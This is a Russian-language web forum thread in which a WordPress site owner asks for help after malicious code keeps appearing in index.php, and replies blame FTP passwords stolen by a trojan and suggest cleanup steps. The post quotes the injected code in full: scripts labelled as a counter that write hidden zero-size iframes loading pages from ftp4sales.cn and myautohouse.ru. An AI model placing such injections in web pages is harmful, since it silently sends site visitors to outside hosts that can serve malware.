В последнее время мне в файл index.php лезет какой-то код.
<!-- counter --><script language=javascript>status=location;document.write('<iframe src="http://ftp4sales.cn/trf/index.php" width=0 height=0 frameborder=0 onLoad="status=defaultStatus;"></iframe>');</script><!-- counter --><iframe src="http://ftp4sales.cn/trf/index.php" width=0 height=0 frameborder=0></iframe><!-- counter --><script language=javascript>status=location;document.write('<iframe src="http://myautohouse.ru/Code/blog/blog/index.php" width=0 height=0 frameborder=0 onLoad="status=defaultStatus;"></iframe>');</script><!-- counter --><!-- counter --><script language=javascript>status=location;document.write('<iframe src="http://ftp4sales.cn/trf/index.php" width=0 height=0 frameborder=0 onLoad="status=defaultStatus;"></iframe>');</script><!-- counter -->В начале и в конце файла.
Некоторые посетители сайта http://fotoset.net/ уже жалуются что при входе их предупреждают что на сайте какой-то опасный код. Хотя сам заходил с нескольких ПК – ничего не заметил.
Дата изменения файла index.php всегда меняется, а меня даже дома нет.
Может у меня не правильно права поставлены? Какие права должны быть на файл index.php и на остальные папки. Например: "Uploads".
Та то у Вас троян стырил пароли от ftp и теперь развлекается вовсю. Права хоть 444 ставьте – не поможет, трояны в большинстве своем уже умеют chmod делать.
Какие должны быть права на файлы и папки мне уже надоело повторять, ищите по форуму.
Пароль на фтп можно поменять?
Здрасьте! НУЖНО. Но сначала вирусы на компе погонять.
Понял. Будет сделано.
Обновил НОД. Почистил вирусы на компе. Сменил пароль к фтп. Заметил, что левый код был во многих файлах ВордПресса и темы. Удалил его и посмотрел "Исходный текст". Кажется левых кодов сейчас нет.
Это должно помочь? Или надо будет все заново заливать? Какие гарантии что пасс не будет взломан еще раз? 🙁
NOD за последний год обленился, собака. Рекомендую поставить Каспера (благо сейчас есть халявный) или Avira, на крайний случай – Avast (imho он придурочный). И регулярно запускать CureIt от Dr.Web.
Залить заново – хорошее решение. Особенно, если подгадать под апдейт версии. И поставьте на всякий случай плагинчик http://www.portal.kharkov.ua/soft/belavir.sphp Уберечь не убережет, но покажет, что изменилось.
Хорошо.
Но сейчас всё нормально? Никакой ошибки не выдает при запуске сайта?
? 🙂